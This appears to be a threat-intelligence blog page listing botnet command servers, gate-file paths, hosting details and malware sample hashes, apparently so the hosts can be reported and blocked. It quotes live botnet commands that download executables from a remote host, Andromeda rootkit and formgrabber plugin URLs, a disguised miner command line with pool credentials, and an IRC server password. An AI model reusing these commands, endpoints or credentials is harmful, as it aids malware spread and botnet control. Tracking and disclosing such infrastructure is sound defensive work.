Server: 46.182.107.35:4042 channel: #pirelli Now talking in #pirelli Topic On: [ #pirelli ] [ !down /99/106/112/81/55/59/40/125/111/122/35/110/105/106/100/107/119/122/121/59/106/120/102/9/71/113/109/127/105/99/54/56/52/50/49/22/48/55/59/15/44/52/51/40/99/101/ 12] Topic By: [ x ] credits to aLiSs for finding this botnet hosting infos: http://whois.domaintools.com/46.182.107.35
synd1cat3.com (Athena http botnet hosted by hostlatte.com)
Resolved synd1cat3.com to 192.95.33.40 Server: synd1cat3.com Gate file: /kJuN2p/gate.php Hosting infos: http://whois.domaintools.com/192.95.33.40 Related md5s (search on malwr.com to download the samples): Athena http: 88730b35c88269066e191695cf1e148d
178.79.183.247 (Lightaidra router botnet hosted by linode.com)
Server: 178.79.183.247, 50.2.193.199, 94.229.66.97 Port: 65112 Current global users: 2898, Max: 2988 Channel: ##hug## Topic for ##hug## is: .advscan->random->b root dreamboxTopic for ##hug## set by gaspolo at Fri May 31 13:36:47 2013 Oper: [GaSp`ZzzZ] (~g45p0@5.144.173.5): g45p0[GaSp`ZzzZ] irc.primo.org :Yet another IRC Server running on Debian GNU/Linux[GaSp`ZzzZ] idle 181:02:12, signon: Thu May 30 22:19:39[GaSp`ZzzZ] End of WHOISRead more...
cthulhuhf.net (Betabot http botnet hosted by warez-host.com)
Resolved cthulhuhf.net to 91.223.82.43 Server: cthulhuhf.net Gate file: /misc/order.php Alternate domains: cthulhuhf.eu cthulhuhf.org.uk cthulhuhf.co.uk cthulhuhf.xxx Hosting infos: http://whois.domaintools.com/91.223.82.43 Related md5s (search on malwr.com to download the samples): Beta bot: aa07b845981ba53b6100dba745ba5c1a
www.mydowncenter.me (Andromeda http botnet hosted by pw-service.com)
Resolved www.mydowncenter.me to 37.0.122.132 Server: www.mydowncenter.me Gate file: /andro/image.php Plugins Rootkit: hxxp://www.mydowncenter.me/andro/r.pack Socks: hxxp://www.mydowncenter.me/andro/s.pack Formgrabber: hxxp://www.mydowncenter.me/andro/f.pack Gate file: /andro/fg.php Hosting infos: http://whois.domaintools.com/37.0.122.132 Related md5s (search on malwr.com to download the samples): Andromeda: a26ffa2c7bd0e7899b04768f9e76a938
150mb samples
This is another package with diferent malware samples have fun analysing them U can have samples here
s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)
Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160 Server: s5.6d6f6e65797072696e746572.com Gate file: /wp-admin/order.php Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com Mining info: svchost.exe’ -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex Hosting infos: http://whois.domaintools.com/188.190.127.160 Related md5s (search on malwr.com to download the samples): Betabot: db9a816d58899f1ba92bc338e89f856a
blackhats.su (Betabot http botnet proxied by cloudflare)
Server: blackhats.su Gate file: /bb/order.php Alternate domains: aeonhf.net aeonhf.me You may recognize one of the domains, as it has appeared on the blog before. They used cloudflare that time as well. Lets see if we can get cloudflare to block access to it again. Related md5s (search on malwr.com to download the samples): Beta bot:Read more...
breathespacesfacebook.org (Socks5Masterz botnet hosted by burst.net)
Resolved breathespacesfacebook.org to 46.37.162.26 Server: breathespacesfacebook.org Gate file: /gate.php Altnerate domains: tweaksights.org gotoguydreamed.org percussiontasked.org tenmileage.org Hosting infos: http://whois.domaintools.com/46.37.162.26 Related md5s (search on malwr.com to download the samples): Proxy bot: 7dc68e49d035107d132e19adf9f23d3b
t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)
Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187 Server: t.baerr01.com Port: 6512 Server password: smart Channel: #dpi :hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe Channel: #tar Channel password: smart A modified ircd is used, making it difficult to connect using a regular irc client. Related md5s (search onRead more...